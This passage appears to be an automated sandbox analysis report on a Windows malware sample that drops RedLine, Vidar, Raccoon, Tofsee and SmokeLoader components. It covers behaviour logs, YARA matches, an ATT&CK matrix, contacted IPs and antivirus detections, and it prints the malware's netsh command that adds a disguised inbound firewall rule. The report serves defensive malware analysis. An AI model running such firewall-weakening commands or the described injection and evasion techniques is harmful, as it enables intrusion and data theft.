                          Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
                          Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
                          Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
                          Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
                          Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
                          Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
                          Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
                          Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformation
                          Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
                          Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
                          Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformation
                          Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformation
                          Source: C:\Users\user\AppData\Local\Temp\12CC.exeQueries volume information: C:\ VolumeInformation
                          Source: C:\Users\user\AppData\Local\Temp\12CC.exeQueries volume information: C:\ VolumeInformation
                          Source: C:\Users\user\AppData\Local\Temp\2655.exeQueries volume information: C:\Users\user\AppData\Local\Temp\2655.exe VolumeInformation
                          Source: C:\Users\user\AppData\Local\Temp\2655.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformation
                          Source: C:\Users\user\AppData\Local\Temp\2655.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Dynamic\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Dynamic.dll VolumeInformation
                          Source: C:\Users\user\AppData\Local\Temp\2655.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                          Source: C:\Windows\SysWOW64\cmd.exeQueries volume information: C:\ VolumeInformation
                          Source: C:\Windows\SysWOW64\netsh.exeQueries volume information: C:\ VolumeInformation
                          Source: C:\Windows\SysWOW64\netsh.exeQueries volume information: C:\ VolumeInformation
                          Source: C:\Windows\SysWOW64\hdysgoc\qflfaqod.exeQueries volume information: C:\ VolumeInformation
                          Source: C:\Windows\SysWOW64\hdysgoc\qflfaqod.exeQueries volume information: C:\ VolumeInformation
                          Source: C:\Windows\explorer.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
                          Source: C:\Users\user\Desktop\NNOKmCIVoi.exeCode function: 0_2_00408886 GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter,
                          Source: C:\Users\user\AppData\Local\Temp\454.exeCode function: 24_2_0040AD40 GetProcessHeap,RtlAllocateHeap,GetTimeZoneInformation,wsprintfA,
                          Source: C:\Users\user\AppData\Local\Temp\454.exeCode function: 24_2_0040ACA0 GetProcessHeap,RtlAllocateHeap,GetUserNameA,
                          Source: C:\Users\user\AppData\Local\Temp\12CC.exeCode function: 25_2_0040405E CreateEventA,ExitProcess,CloseHandle,CreateNamedPipeA,Sleep,CloseHandle,ConnectNamedPipe,GetLastError,DisconnectNamedPipe,CloseHandle,CloseHandle,CloseHandle,
                          Source: C:\Users\user\Desktop\NNOKmCIVoi.exeCode function: 0_2_0040137E __EH_prolog,FileTimeToDosDateTime,TerminateThread,GetConsoleAliasesA,FindResourceExA,GetVersionExA,ResetWriteWatch,CreateRemoteThread,SetComputerNameExA,SetCaretPos,_printf,_malloc,_calloc,__wfopen_s,_fseek,__floor_pentium4,_puts,GetConsoleAliasA,GetModuleHandleA,LocalAlloc,WriteConsoleA,GetConsoleTitleW,GetAtomNameW,HeapLock,GetFileAttributesA,GetDefaultCommConfigA,

                          Lowering of HIPS / PFW / Operating System Security Settings:

                          barindex
                          Uses netsh to modify the Windows network and firewall settingsShow sources
                          Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\SysWOW64\netsh.exe "C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="Host-process for services of Windows" dir=in action=allow program="C:\Windows\SysWOW64\svchost.exe" enable=yes>nul
                          Changes security center settings (notifications, updates, antivirus, firewall)Show sources
                          Source: C:\Windows\System32\svchost.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center cvalJump to behavior
                          Modifies the windows firewallShow sources
                          Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\SysWOW64\netsh.exe "C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="Host-process for services of Windows" dir=in action=allow program="C:\Windows\SysWOW64\svchost.exe" enable=yes>nul
                          Source: C:\Windows\System32\svchost.exeWMI Queries: IWbemServices::ExecNotificationQuery - ROOT\SecurityCenter : SELECT * FROM __InstanceOperationEvent WHERE TargetInstance ISA &apos;AntiVirusProduct&apos; OR TargetInstance ISA &apos;FirewallProduct&apos; OR TargetInstance ISA &apos;AntiSpywareProduct&apos;
                          Source: C:\Windows\System32\svchost.exeWMI Queries: IWbemServices::CreateInstanceEnum - ROOT\SecurityCenter2 : FirewallProduct
                          Source: C:\Windows\System32\svchost.exeWMI Queries: IWbemServices::CreateInstanceEnum - ROOT\SecurityCenter2 : AntiVirusProduct
                          Source: C:\Windows\System32\svchost.exeWMI Queries: IWbemServices::CreateInstanceEnum - ROOT\SecurityCenter2 : AntiSpywareProduct
                          Source: svchost.exe, 0000000C.00000002.525967349.00000240A9902000.00000004.00000001.sdmpBinary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
                          Source: svchost.exe, 0000000C.00000002.525883927.00000240A9840000.00000004.00000001.sdmpBinary or memory string: *@V%ProgramFiles%\Windows Defender\MsMpeng.exe

                          Stealing of Sensitive Information:

                          barindex
                          Yara detected RedLine StealerShow sources
                          Source: Yara matchFile source: 26.2.2655.exe.444f910.1.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 26.2.2655.exe.444f910.1.raw.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 0000002B.00000002.487901560.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                          Source: Yara matchFile source: 0000002B.00000000.440870987.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                          Source: Yara matchFile source: 0000002B.00000000.444000349.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                          Source: Yara matchFile source: 0000001A.00000002.447200055.0000000004331000.00000004.00000001.sdmp, type: MEMORY
                          Source: Yara matchFile source: 0000002B.00000000.443555331.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                          Source: Yara matchFile source: 0000002B.00000000.441837474.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                          Source: Yara matchFile source: 0000002B.00000000.441356483.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                          Source: Yara matchFile source: 0000002B.00000000.442325169.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                          Source: Yara matchFile source: dump.pcap, type: PCAP
                          Yara detected VidarShow sources
                          Source: Yara matchFile source: dump.pcap, type: PCAP
                          Yara detected SmokeLoaderShow sources
                          Source: Yara matchFile source: 0.2.NNOKmCIVoi.exe.4715a0.1.raw.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 1.1.NNOKmCIVoi.exe.400000.0.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 1.2.NNOKmCIVoi.exe.400000.0.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 19.0.eugcwgv.400000.5.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 19.0.eugcwgv.400000.6.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 18.2.eugcwgv.5c15a0.1.raw.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 19.1.eugcwgv.400000.0.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 19.2.eugcwgv.400000.0.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 19.0.eugcwgv.400000.4.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 00000001.00000002.319704105.0000000002161000.00000004.00020000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000013.00000002.376787167.0000000001F51000.00000004.00020000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000001.00000002.319374024.00000000004B0000.00000004.00000001.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000013.00000002.376757329.0000000001F30000.00000004.00000001.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000006.00000000.304234913.0000000004F21000.00000020.00020000.sdmp, type: MEMORY
                          Yara detected Raccoon StealerShow sources
                          Source: Yara matchFile source: 0000002F.00000002.526432273.0000000000400000.00000040.00020000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 0000002F.00000002.545472063.0000000004860000.00000040.00000001.sdmp, type: MEMORY
                          Source: Yara matchFile source: 0000002F.00000003.462885844.0000000004990000.00000004.00000001.sdmp, type: MEMORY
                          Yara detected Vidar stealerShow sources
                          Source: Yara matchFile source: 00000018.00000002.388741222.00000000005D8000.00000004.00000020.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000030.00000002.534737825.0000000002210000.00000040.00000001.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000030.00000003.479838364.0000000002390000.00000004.00000001.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000030.00000002.529077332.0000000000400000.00000040.00020000.sdmp, type: MEMORY
                          Yara detected TofseeShow sources
                          Source: Yara matchFile source: 41.2.qflfaqod.exe.d40e50.1.raw.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 25.2.12CC.exe.2090e50.1.raw.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 25.2.12CC.exe.400000.0.raw.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 41.3.qflfaqod.exe.d60000.0.raw.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 25.2.12CC.exe.400000.0.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 41.2.qflfaqod.exe.da0000.2.raw.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 25.3.12CC.exe.20b0000.0.raw.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 41.2.qflfaqod.exe.da0000.2.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 41.2.qflfaqod.exe.400000.0.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 41.2.qflfaqod.exe.400000.0.raw.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 00000019.00000002.420370458.0000000000400000.00000040.00020000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000029.00000002.430698166.0000000000D40000.00000040.00000001.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000029.00000002.430085518.0000000000400000.00000040.00020000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000019.00000002.423567221.0000000002090000.00000040.00000001.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000029.00000002.430746891.0000000000DA0000.00000004.00000001.sdmp, type: MEMORY
                          Source: Yara matchFile source: 0000002C.00000002.527865017.0000000000190000.00000040.00000001.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000029.00000003.427461550.0000000000D60000.00000004.00000001.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000019.00000003.400320288.00000000020B0000.00000004.00000001.sdmp, type: MEMORY
                          Source: Yara matchFile source: Process Memory Space: 12CC.exe PID: 6648, type: MEMORYSTR
                          Source: Yara matchFile source: Process Memory Space: qflfaqod.exe PID: 4380, type: MEMORYSTR
                          Source: Yara matchFile source: 00000018.00000002.388741222.00000000005D8000.00000004.00000020.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000030.00000002.534737825.0000000002210000.00000040.00000001.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000030.00000003.479838364.0000000002390000.00000004.00000001.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000030.00000002.529899968.0000000000804000.00000004.00000020.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000030.00000002.529077332.0000000000400000.00000040.00020000.sdmp, type: MEMORY

                          Remote Access Functionality:

                          barindex
                          Yara detected RedLine StealerShow sources
                          Source: Yara matchFile source: 26.2.2655.exe.444f910.1.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 26.2.2655.exe.444f910.1.raw.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 0000002B.00000002.487901560.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                          Source: Yara matchFile source: 0000002B.00000000.440870987.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                          Source: Yara matchFile source: 0000002B.00000000.444000349.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                          Source: Yara matchFile source: 0000001A.00000002.447200055.0000000004331000.00000004.00000001.sdmp, type: MEMORY
                          Source: Yara matchFile source: 0000002B.00000000.443555331.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                          Source: Yara matchFile source: 0000002B.00000000.441837474.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                          Source: Yara matchFile source: 0000002B.00000000.441356483.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                          Source: Yara matchFile source: 0000002B.00000000.442325169.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                          Source: Yara matchFile source: dump.pcap, type: PCAP
                          Yara detected VidarShow sources
                          Source: Yara matchFile source: dump.pcap, type: PCAP
                          Yara detected SmokeLoaderShow sources
                          Source: Yara matchFile source: 0.2.NNOKmCIVoi.exe.4715a0.1.raw.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 1.1.NNOKmCIVoi.exe.400000.0.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 1.2.NNOKmCIVoi.exe.400000.0.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 19.0.eugcwgv.400000.5.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 19.0.eugcwgv.400000.6.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 18.2.eugcwgv.5c15a0.1.raw.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 19.1.eugcwgv.400000.0.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 19.2.eugcwgv.400000.0.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 19.0.eugcwgv.400000.4.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 00000001.00000002.319704105.0000000002161000.00000004.00020000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000013.00000002.376787167.0000000001F51000.00000004.00020000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000001.00000002.319374024.00000000004B0000.00000004.00000001.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000013.00000002.376757329.0000000001F30000.00000004.00000001.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000006.00000000.304234913.0000000004F21000.00000020.00020000.sdmp, type: MEMORY
                          Yara detected Raccoon StealerShow sources
                          Source: Yara matchFile source: 0000002F.00000002.526432273.0000000000400000.00000040.00020000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 0000002F.00000002.545472063.0000000004860000.00000040.00000001.sdmp, type: MEMORY
                          Source: Yara matchFile source: 0000002F.00000003.462885844.0000000004990000.00000004.00000001.sdmp, type: MEMORY
                          Yara detected Vidar stealerShow sources
                          Source: Yara matchFile source: 00000018.00000002.388741222.00000000005D8000.00000004.00000020.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000030.00000002.534737825.0000000002210000.00000040.00000001.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000030.00000003.479838364.0000000002390000.00000004.00000001.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000030.00000002.529077332.0000000000400000.00000040.00020000.sdmp, type: MEMORY
                          Yara detected TofseeShow sources
                          Source: Yara matchFile source: 41.2.qflfaqod.exe.d40e50.1.raw.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 25.2.12CC.exe.2090e50.1.raw.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 25.2.12CC.exe.400000.0.raw.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 41.3.qflfaqod.exe.d60000.0.raw.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 25.2.12CC.exe.400000.0.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 41.2.qflfaqod.exe.da0000.2.raw.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 25.3.12CC.exe.20b0000.0.raw.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 41.2.qflfaqod.exe.da0000.2.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 41.2.qflfaqod.exe.400000.0.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 41.2.qflfaqod.exe.400000.0.raw.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 00000019.00000002.420370458.0000000000400000.00000040.00020000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000029.00000002.430698166.0000000000D40000.00000040.00000001.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000029.00000002.430085518.0000000000400000.00000040.00020000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000019.00000002.423567221.0000000002090000.00000040.00000001.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000029.00000002.430746891.0000000000DA0000.00000004.00000001.sdmp, type: MEMORY
                          Source: Yara matchFile source: 0000002C.00000002.527865017.0000000000190000.00000040.00000001.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000029.00000003.427461550.0000000000D60000.00000004.00000001.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000019.00000003.400320288.00000000020B0000.00000004.00000001.sdmp, type: MEMORY
                          Source: Yara matchFile source: Process Memory Space: 12CC.exe PID: 6648, type: MEMORYSTR
                          Source: Yara matchFile source: Process Memory Space: qflfaqod.exe PID: 4380, type: MEMORYSTR
                          Source: C:\Users\user\AppData\Local\Temp\12CC.exeCode function: 25_2_004088B0 CreateThread,CreateThread,send,recv,socket,connect,closesocket,setsockopt,bind,listen,accept,select,getpeername,getsockname,
                          Source: C:\Windows\SysWOW64\hdysgoc\qflfaqod.exeCode function: 41_2_004088B0 CreateThread,CreateThread,send,recv,socket,connect,closesocket,setsockopt,bind,listen,accept,select,getpeername,getsockname,

                          Mitre Att&ck Matrix

                          Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
                          Valid Accounts1Windows Management Instrumentation1DLL Side-Loading1DLL Side-Loading1Disable or Modify Tools311Input Capture1System Time Discovery2Remote ServicesArchive Collected Data11Exfiltration Over Other Network MediumIngress Tool Transfer15Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
                          Default AccountsNative API541Application Shimming1Application Shimming1Deobfuscate/Decode Files or Information11LSASS MemoryAccount Discovery1Remote Desktop ProtocolInput Capture1Exfiltration Over BluetoothEncrypted Channel21Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
                          Domain AccountsExploitation for Client Execution1Valid Accounts1Valid Accounts1Obfuscated Files or Information3Security Account ManagerFile and Directory Discovery2SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationNon-Standard Port1Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
                          Local AccountsCommand and Scripting Interpreter3Windows Service4Access Token Manipulation1Software Packing33NTDSSystem Information Discovery237Distributed Component Object ModelInput CaptureScheduled TransferNon-Application Layer Protocol5SIM Card SwapCarrier Billing Fraud
                          Cloud AccountsService Execution3Network Logon ScriptWindows Service4Timestomp1LSA SecretsQuery Registry1SSHKeyloggingData Transfer Size LimitsApplication Layer Protocol36Manipulate Device CommunicationManipulate App Store Rankings or Ratings
                          Replication Through Removable MediaLaunchdRc.commonProcess Injection713DLL Side-Loading1Cached Domain CredentialsSecurity Software Discovery571VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
                          External Remote ServicesScheduled TaskStartup ItemsStartup ItemsFile Deletion1DCSyncProcess Discovery2Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
                          Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/JobMasquerading131Proc FilesystemVirtualization/Sandbox Evasion241Shared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
                          Exploit Public-Facing ApplicationPowerShellAt (Linux)At (Linux)Valid Accounts1/etc/passwd and /etc/shadowApplication Window Discovery1Software Deployment ToolsData StagedExfiltration Over Asymmetric Encrypted Non-C2 ProtocolWeb ProtocolsRogue Cellular Base StationData Destruction
                          Supply Chain CompromiseAppleScriptAt (Windows)At (Windows)Access Token Manipulation1Network SniffingSystem Owner/User Discovery1Taint Shared ContentLocal Data StagingExfiltration Over Unencrypted/Obfuscated Non-C2 ProtocolFile Transfer ProtocolsData Encrypted for Impact
                          Compromise Software Dependencies and Development ToolsWindows Command ShellCronCronVirtualization/Sandbox Evasion241Input CaptureRemote System Discovery1Replication Through Removable MediaRemote Data StagingExfiltration Over Physical MediumMail ProtocolsService Stop
                          Compromise Software Supply ChainUnix ShellLaunchdLaunchdProcess Injection713KeyloggingLocal GroupsComponent Object Model and Distributed COMScreen CaptureExfiltration over USBDNSInhibit System Recovery
                          Compromise Hardware Supply ChainVisual BasicScheduled TaskScheduled TaskHidden Files and Directories1GUI Input CaptureDomain GroupsExploitation of Remote ServicesEmail CollectionCommonly Used PortProxyDefacement

                          Behavior Graph

                          Hide Legend

                          Legend:

                          • Process
                          • Signature
                          • Created File
                          • DNS/IP Info
                          • Is Dropped
                          • Is Windows Process
                          • Number of created Registry Values
                          • Number of created Files
                          • Visual Basic
                          • Delphi
                          • Java
                          • .Net C# or VB.NET
                          • C, C++ or other language
                          • Is malicious
                          • Internet
                          behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 551246 Sample: NNOKmCIVoi.exe Startdate: 11/01/2022 Architecture: WINDOWS Score: 100 78 78.46.160.87, 49892, 49907, 80 HETZNER-ASDE Germany 2->78 80 185.163.204.24, 49884, 80 CAUCASUS-CABLE-SYSTEMCCSAutonomousSystemGE Germany 2->80 82 5 other IPs or domains 2->82 100 Snort IDS alert for network traffic (e.g. based on Emerging Threat rules) 2->100 102 Antivirus detection for URL or domain 2->102 104 Antivirus detection for dropped file 2->104 106 20 other signatures 2->106 11 NNOKmCIVoi.exe 2->11         started        14 eugcwgv 2->14         started        16 qflfaqod.exe 2->16         started        18 9 other processes 2->18 signatures3 process4 dnsIp5 132 Contains functionality to inject code into remote processes 11->132 134 Injects a PE file into a foreign processes 11->134 21 NNOKmCIVoi.exe 11->21         started        136 Multi AV Scanner detection for dropped file 14->136 138 Machine Learning detection for dropped file 14->138 24 eugcwgv 14->24         started        140 Detected unpacking (changes PE section rights) 16->140 142 Detected unpacking (overwrites its own PE header) 16->142 144 Writes to foreign memory regions 16->144 146 Allocates memory in foreign processes 16->146 84 127.0.0.1 unknown unknown 18->84 148 Changes security center settings (notifications, updates, antivirus, firewall) 18->148 150 Uses netsh to modify the Windows network and firewall settings 18->150 152 Modifies the windows firewall 18->152 26 MpCmdRun.exe 18->26         started        28 WerFault.exe 18->28         started        signatures6 process7 signatures8 108 Checks for kernel code integrity (NtQuerySystemInformation(CodeIntegrityInformation)) 21->108 110 Maps a DLL or memory area into another process 21->110 112 Checks if the current machine is a virtual machine (disk enumeration) 21->112 30 explorer.exe 10 21->30 injected 114 Creates a thread in another existing process (thread injection) 24->114 35 conhost.exe 26->35         started        process9 dnsIp10 86 185.233.81.115, 443, 49787 SUPERSERVERSDATACENTERRU Russian Federation 30->86 88 188.166.28.199, 80 DIGITALOCEAN-ASNUS Netherlands 30->88 90 12 other IPs or domains 30->90 68 C:\Users\user\AppData\Roaming\eugcwgv, PE32 30->68 dropped 70 C:\Users\user\AppData\Local\Temp\D78A.exe, PE32 30->70 dropped 72 C:\Users\user\AppData\Local\Temp\A7DB.exe, PE32 30->72 dropped 74 9 other files (7 malicious) 30->74 dropped 92 System process connects to network (likely due to code injection or exploit) 30->92 94 Benign windows process drops PE files 30->94 96 Performs DNS queries to domains with low reputation 30->96 98 2 other signatures 30->98 37 454.exe 30->37         started        40 2655.exe 3 30->40         started        42 12CC.exe 2 30->42         started        45 2 other processes 30->45 file11 signatures12 process13 file14 116 Detected unpacking (changes PE section rights) 37->116 118 Detected unpacking (overwrites its own PE header) 37->118 120 Found evasive API chain (may stop execution after checking mutex) 37->120 130 4 other signatures 37->130 122 Antivirus detection for dropped file 40->122 124 Multi AV Scanner detection for dropped file 40->124 126 Machine Learning detection for dropped file 40->126 128 Injects a PE file into a foreign processes 40->128 66 C:\Users\user\AppData\Local\...\qflfaqod.exe, PE32 42->66 dropped 47 cmd.exe 45->47         started        50 cmd.exe 45->50         started        52 sc.exe 45->52         started        54 4 other processes 45->54 signatures15 process16 file17 76 C:\Windows\SysWOW64\...\qflfaqod.exe (copy), PE32 47->76 dropped 56 conhost.exe 47->56         started        58 conhost.exe 50->58         started        60 conhost.exe 52->60         started        62 conhost.exe 54->62         started        64 conhost.exe 54->64         started        process18

                          Screenshots

                          Thumbnails

                          This section contains all screenshots as thumbnails, including those not shown in the slideshow.

                          windows-stand

                          Antivirus, Machine Learning and Genetic Malware Detection

                          Initial Sample

                          SourceDetectionScannerLabelLink
                          NNOKmCIVoi.exe33%VirustotalBrowse
                          NNOKmCIVoi.exe65%ReversingLabsWin32.Ransomware.StopCrypt
                          NNOKmCIVoi.exe100%Joe Sandbox ML

                          Dropped Files

                          SourceDetectionScannerLabelLink
                          C:\Users\user\AppData\Local\Temp\8F03.exe100%AviraTR/AD.StellarStealer.rfurr
                          C:\Users\user\AppData\Local\Temp\2655.exe100%AviraHEUR/AGEN.1211353
                          C:\Users\user\AppData\Local\Temp\454.exe100%Joe Sandbox ML
                          C:\Users\user\AppData\Local\Temp\qflfaqod.exe100%Joe Sandbox ML
                          C:\Users\user\AppData\Local\Temp\8F03.exe100%Joe Sandbox ML
                          C:\Users\user\AppData\Roaming\eugcwgv100%Joe Sandbox ML
                          C:\Users\user\AppData\Local\Temp\D78A.exe100%Joe Sandbox ML
                          C:\Users\user\AppData\Local\Temp\C71D.exe100%Joe Sandbox ML
                          C:\Users\user\AppData\Local\Temp\A7DB.exe100%Joe Sandbox ML
                          C:\Users\user\AppData\Local\Temp\12CC.exe100%Joe Sandbox ML
                          C:\Users\user\AppData\Local\Temp\3412.exe100%Joe Sandbox ML
                          C:\Users\user\AppData\Local\Temp\2655.exe100%Joe Sandbox ML
                          C:\Users\user\AppData\Local\Temp\2655.exe67%ReversingLabsByteCode-MSIL.Trojan.AgentTesla
                          C:\Users\user\AppData\Local\Temp\3412.exe77%ReversingLabsWin32.Trojan.Raccoon
                          C:\Users\user\AppData\Local\Temp\8F03.exe37%MetadefenderBrowse
                          C:\Users\user\AppData\Local\Temp\8F03.exe84%ReversingLabsWin32.Trojan.Raccoon
                          C:\Users\user\AppData\Roaming\eugcwgv65%ReversingLabsWin32.Ransomware.StopCrypt

                          Unpacked PE Files

                          SourceDetectionScannerLabelLinkDownload
                          26.0.2655.exe.f80000.2.unpack100%AviraHEUR/AGEN.1211353Download File
                          1.1.NNOKmCIVoi.exe.400000.0.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                          20.0.3412.exe.500e50.5.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                          41.2.qflfaqod.exe.d40e50.1.unpack100%AviraTR/Patched.Ren.GenDownload File
                          1.0.NNOKmCIVoi.exe.400000.4.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                          26.0.2655.exe.f80000.3.unpack100%AviraHEUR/AGEN.1211353Download File
                          25.2.12CC.exe.400000.0.unpack100%AviraBDS/Backdoor.GenDownload File
                          20.2.3412.exe.400000.0.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                          24.2.454.exe.400000.0.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                          24.3.454.exe.570000.0.unpack100%AviraTR/Patched.Ren.GenDownload File
                          1.2.NNOKmCIVoi.exe.400000.0.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                          20.0.3412.exe.400000.6.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                          25.2.12CC.exe.2090e50.1.unpack100%AviraTR/Patched.Ren.GenDownload File
                          41.3.qflfaqod.exe.d60000.0.unpack100%AviraTR/Patched.Ren.GenDownload File
                          26.0.2655.exe.f80000.1.unpack100%AviraHEUR/AGEN.1211353Download File
                          20.0.3412.exe.500e50.7.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                          20.0.3412.exe.400000.4.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                          26.2.2655.exe.f80000.0.unpack100%AviraHEUR/AGEN.1211353Download File
                          1.0.NNOKmCIVoi.exe.400000.5.unpack100%AviraTR/Crypt.XPACK.GenDownload File
